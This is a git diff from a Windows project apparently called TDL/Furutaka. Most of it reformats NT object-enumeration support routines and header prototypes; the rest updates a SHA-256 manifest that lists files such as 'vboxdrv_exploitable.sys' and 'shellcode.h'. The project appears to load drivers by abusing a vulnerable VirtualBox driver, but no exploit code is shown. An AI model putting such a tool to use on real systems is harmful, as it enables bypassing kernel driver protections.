+ // We can use root directory. + if (pwszRootDirectory != NULL) { + RtlSecureZeroMemory(&sname, sizeof(sname)); + RtlInitUnicodeString(&sname, pwszRootDirectory); + InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); + status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); + if (!NT_SUCCESS(status)) { + return status; + } + } + else { + if (hRootDirectory == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + hDirectory = hRootDirectory; + } - // Enumerate objects in directory. - ctx = 0; - do { + // Enumerate objects in directory. + ctx = 0; + do { - rlen = 0; - status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); - if (status != STATUS_BUFFER_TOO_SMALL) - break; + rlen = 0; + status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); + if (status != STATUS_BUFFER_TOO_SMALL) + break; - objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); - if (objinf == NULL) - break; + objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); + if (objinf == NULL) + break; - status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); - if (!NT_SUCCESS(status)) { - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - break; - } + status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); + if (!NT_SUCCESS(status)) { + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + break; + } - CallbackStatus = CallbackProc(objinf, CallbackParam); + CallbackStatus = CallbackProc(objinf, CallbackParam); - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - if (NT_SUCCESS(CallbackStatus)) { - status = STATUS_SUCCESS; - break; - } + if (NT_SUCCESS(CallbackStatus)) { + status = STATUS_SUCCESS; + break; + } - } while (cond); + } while (cond); - if (hDirectory != NULL) { - NtClose(hDirectory); - } + if (hDirectory != NULL) { + NtClose(hDirectory); + } - } - __except (EXCEPTION_EXECUTE_HANDLER) { - status = STATUS_ACCESS_VIOLATION; - } + } + __except (EXCEPTION_EXECUTE_HANDLER) { + status = STATUS_ACCESS_VIOLATION; + } - return status; + return status; } /* @@ -405,18 +405,18 @@ NTSTATUS NTAPI supEnumSystemObjects( * */ BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ) + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +) { - OBJSCANPARAM Param; + OBJSCANPARAM Param; - if (ObjectName == NULL) { - return FALSE; - } + if (ObjectName == NULL) { + return FALSE; + } - Param.Buffer = ObjectName; - Param.BufferSize = (ULONG)_strlen(ObjectName); + Param.Buffer = ObjectName; + Param.BufferSize = (ULONG)_strlen(ObjectName); - return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); + return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); } diff --git a/Source/Furutaka/sup.h b/Source/Furutaka/sup.h index e1cd4fa..10bab5d 100644 --- a/Source/Furutaka/sup.h +++ b/Source/Furutaka/sup.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * Common header file for the program support routines. * @@ -21,39 +21,39 @@ typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); typedef struct _OBJSCANPARAM { - PWSTR Buffer; - ULONG BufferSize; + PWSTR Buffer; + ULONG BufferSize; } OBJSCANPARAM, *POBJSCANPARAM; ULONG_PTR supGetNtOsBase( - VOID - ); + VOID +); PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ); + _In_ SYSTEM_INFORMATION_CLASS InfoClass +); PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ); + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +); BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ); + _In_ BOOL bRestore +); SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ); + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +); BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ); + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +); #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) diff --git a/TDL.sha256 b/TDL.sha256 index 2d5ae90..8a8ffcf 100644 --- a/TDL.sha256 +++ b/TDL.sha256 @@ -1,29 +1,36 @@ c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys 4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys -48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe +9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln 01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln 2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln -746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c -3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h -cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys -01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln -c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj +e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c +6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h +24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln +16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters -2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user -1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h -c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c -964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h -8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c +b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user +1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h +94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c +33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h +c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c +8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h +fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h +2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc +f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h +fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c +059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h +12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h +cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h @@ -38,10 +45,3 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutak 27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c 60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c 87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c -8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h -fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h -8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc -a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h -2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c -d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h -12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h